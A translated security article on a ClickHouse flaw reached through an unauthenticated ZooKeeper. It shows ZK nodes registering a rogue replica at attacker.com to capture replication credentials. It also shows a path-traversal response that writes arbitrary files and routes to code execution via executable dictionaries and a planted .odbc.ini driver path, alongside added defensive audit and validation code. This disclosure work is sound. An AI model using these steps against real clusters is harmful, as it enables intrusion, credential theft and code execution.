Why should you lock up the zoo?

This article covers a rather specific vulnerability in the ClickHouse replication protocol and shows how it expands the attack surface.

ClickHouse is a database for storing large volumes of data that typically runs with more than one replica. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require write permissions to it.

The default ZK installation does not require authentication, so thousands of ZK servers used for Kafka, Hadoop and ClickHouse configuration are publicly reachable.

To reduce your attack surface, always configure authentication and authorization when installing ZooKeeper.

Of course, there are also some 0days based on Java deserialization, but imagine that an attacker can simply read from and write to the ZooKeeper used for ClickHouse replication.

When configured in cluster mode, ClickHouse supports distributed DDL queries, which go through ZK: for them, nodes are created under the /clickhouse/task_queue/ddl path.

For example, you create a node /clickhouse/task_queue/ddl/query-0001 with the contents:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

After this, the test table will be dropped on the cluster hosts host1 and host2. Distributed DDL also supports executing CREATE/ALTER/DROP queries.

Scary? But where does the attacker get the server addresses?

ClickHouse replication works at the level of individual tables, so when a table is created, the server responsible for exchanging data with the other replicas is recorded in ZK. For example, when executing the following query (ZK must be configured; chXX is the replica name, foobar is the table name):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

column and metadata nodes will be created.

Contents of /clickhouse/tables/01/foobar/replicas/chXX/host:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Can data be pulled from this cluster? Yes, if the replication port (TCP/9009) on the chXX-address server is not closed by a firewall and authentication for replication is not configured. How to bypass authentication?

An attacker can create a new replica in ZK by simply copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the host value.

Contents of /clickhouse/tables/01-01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Then the other replicas need to be told that there is a new data block on the attacker's server which they must fetch: a node /clickhouse/tables/01-01/foobar/log/log-00000000XX is created in ZK (XX is a monotonically increasing counter and must be greater than the last one in the event log):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

where source replica is the name of the attacker's replica created in the previous step, block_id is the data block identifier, and get is the "fetch block" command (there are also commands for other operations).

Next, each replica reads the new event from the log and goes to the attacker-controlled server to receive the data block (the replication protocol is binary and runs over HTTP). attacker.com will receive requests like:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

XXX is the replication authentication data. In some cases this may be an account that also has access to the database via the native ClickHouse protocol and HTTP. As you can see, the attack surface becomes huge because the ZooKeeper used for replication was left without authentication configured.
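A defender's counterpart to the steps above, as an added example that is not ClickHouse's code: given a snapshot of the table's ZK subtree (constructed here from the node contents shown in the article) and an inventory of the real replica hosts (an assumption, TRUSTED_HOSTS), it flags a replica registration that advertises a foreign host and any log entry asking replicas to fetch a part from it. The function names are invented for this illustration.

```python
# Added example (not ClickHouse's code): audit a ZooKeeper replication tree
# for replicas that point outside the known host inventory.
TRUSTED_HOSTS = {"chXX-address"}  # assumption: the cluster's real replica hosts

ZK_SNAPSHOT = {  # constructed from the node contents shown in the article
    "/clickhouse/tables/01-01/foobar/replicas/chXX/host":
        "host: chXX-address\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n",
    "/clickhouse/tables/01-01/foobar/replicas/attacker/host":
        "host: attacker.com\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n",
    "/clickhouse/tables/01-01/foobar/log/log-0000000042":
        "format version: 4\ncreate_time: 2019-07-31 09:37:42\n"
        "source replica: attacker\n"
        "block_id: all_7192349136365807998_13893666115934954449\n"
        "get\nall_0_0_2\n",
}


def parse_kv(text):
    """Parse the 'key: value' header lines used by the host and log nodes."""
    out = {}
    for line in text.splitlines():
        if ": " in line:
            key, value = line.split(": ", 1)
            out[key] = value
    return out


def audit_table(snapshot, table_path, trusted_hosts):
    """Return human-readable findings for one replicated table."""
    findings = []
    replica_host = {}
    prefix = table_path + "/replicas/"
    # 1. every registered replica must advertise a host from the inventory
    for path, content in snapshot.items():
        if path.startswith(prefix) and path.endswith("/host"):
            name = path[len(prefix):-len("/host")]
            host = parse_kv(content).get("host")
            replica_host[name] = host
            if host not in trusted_hosts:
                findings.append(f"replica {name!r} advertises untrusted host {host!r}")
    # 2. no log entry may ask replicas to fetch a part from an untrusted source
    for path, content in snapshot.items():
        if path.startswith(table_path + "/log/"):
            src = parse_kv(content).get("source replica")
            # the command is the first line that is not a 'key: value' header
            cmd = next((l for l in content.splitlines() if ": " not in l), "?")
            if replica_host.get(src) not in trusted_hosts:
                findings.append(f"{path.rsplit('/', 1)[1]}: {cmd!r} from untrusted replica {src!r}")
    return findings
```

In a real deployment the snapshot would be read with a ZK client and the audit run periodically, or the same checks applied to the ZK audit log.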

Let's look at the function that fetches a data block from a replica; it is written with full confidence that all replicas are under proper control and trust each other.

[Image: replication processing code]

The function reads the number of files, then each file's name, size and contents, and writes them to the filesystem. The storage layout in the filesystem deserves a separate description.

There are several subdirectories in /var/lib/clickhouse (the default storage directory from the config file):

flags - directory for flag files, used for recovering from data loss;
tmp - directory for temporary files;
user_files - file operations in queries (INTO OUTFILE and others) are restricted to this directory;
metadata - sql files with table definitions;
preprocessed_configs - processed derived config files from /etc/clickhouse-server;
data - the directory with the actual data; a separate subdirectory is created here for each database (for example /var/lib/clickhouse/data/default).

For each table, a subdirectory is created in the database directory. Each column is a separate file in machine format. For example, for the foobar table created by the attacker, the following files will be created:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

The replica expects to receive files with these same names when processing a data block and does not validate the names in any way.

The attentive reader has probably already guessed about the unsafe concatenation of file_name in the WriteBufferFromFile call. Yes, with it an attacker can write arbitrary contents to any file on the filesystem that the clickhouse user can write to. To do this, the attacker-controlled replica must return the following response to the request (line breaks added for readability):

\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

and after concatenating ../../../../../../../../../tmp/pwned, the file /tmp/pwned will be written with the content hellofromzookeeper.
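The response above, parsed as an added example that is not ClickHouse's code: it shows where plain concatenation would place the file and the check that keeps a received name inside the part directory. The byte layout (a file count, then per file an 8-byte big-endian length with the name and another with the contents), the target directory PART_DIR and the function names are assumptions made for this illustration.

```python
# Added example (not ClickHouse's code): decode a part-exchange response and
# refuse file names that would escape the part directory.
import posixpath
import struct

PART_DIR = "/var/lib/clickhouse/data/default/foobar/all_0_0_2"  # assumed target
EXPECTED_FILES = {"action_id.bin", "action_id.mrk2", "checksums.txt", "columns.txt",
                  "count.txt", "primary.idx", "status.bin", "status.mrk2"}


def build_response(files):
    """Encode [(name, content), ...] the way the article's listing shows."""
    data = bytes([len(files)])
    for name, content in files:
        data += struct.pack(">Q", len(name)) + name.encode()
        data += struct.pack(">Q", len(content)) + content
    return data


ATTACKER_RESPONSE = build_response(  # constructed: the article's response, line breaks removed
    [("../../../../../../../../../tmp/pwned", b"hellofromzookeeper")])


def parse_parts(data):
    """Decode the response into (name, content) pairs; no validation here."""
    pos, count, files = 1, data[0], []
    for _ in range(count):
        (n,) = struct.unpack_from(">Q", data, pos)
        name = data[pos + 8:pos + 8 + n].decode()
        pos += 8 + n
        (m,) = struct.unpack_from(">Q", data, pos)
        files.append((name, data[pos + 8:pos + 8 + m]))
        pos += 8 + m
    return files


def unsafe_target(name, part_dir=PART_DIR):
    """Where plain concatenation would write: demonstrates the traversal."""
    return posixpath.normpath(part_dir + "/" + name)


def safe_name(name):
    """Hardened check: a bare file name from the expected set, nothing else."""
    return posixpath.basename(name) == name and name in EXPECTED_FILES


def receive_part(data, part_dir=PART_DIR):
    """Map accepted file names to their target paths; reject any bad name."""
    targets = {}
    for name, content in parse_parts(data):
        if not safe_name(name):
            raise ValueError(f"rejected file name {name!r}")
        targets[posixpath.join(part_dir, name)] = content
    return targets
```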

There are several options for turning this file write into remote code execution (RCE).

External dictionaries to RCE

In older versions, the ClickHouse configuration directory was owned by the clickhouse user by default. The configuration files are XML files that the service reads at startup and then stores in /var/lib/clickhouse/preprocessed_configs. If they change, they are re-read. So with write access to /etc/clickhouse-server an attacker can create their own external dictionary of type executable and then run arbitrary code. Current versions of ClickHouse do not grant these permissions by default, but if the server has been upgraded step by step, the old permissions may still be in place. If you maintain a ClickHouse cluster, check the permissions on the configuration directory; it should be owned by the root user.

ODBC to RCE

When the package is installed, a clickhouse user is created, but its home directory /nonexistent is not. However, when using external dictionaries, or for other reasons, administrators create the /nonexistent directory and give the clickhouse user write access to it (SSZB! - translator's note).

ClickHouse supports ODBC and can connect to other databases. In ODBC you can specify the path to the database driver library (.so). Older versions of ClickHouse allowed this directly in the query handler, but a stricter connection string check has since been added in odbc-bridge, so the driver path can no longer be specified from a query. But what if the attacker can write to the home directory using the vulnerability described above?

Create a ~/.odbc.ini file with contents like this:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

then running SELECT * FROM odbc('DSN=lalala', 'test', 'test'); will load the test.so library and yield RCE (thanks to buglloc for the tip).

These and other vulnerabilities have been fixed in ClickHouse version 19.14.3. Take care of your ClickHouse and your ZooKeepers!

Source: will.com
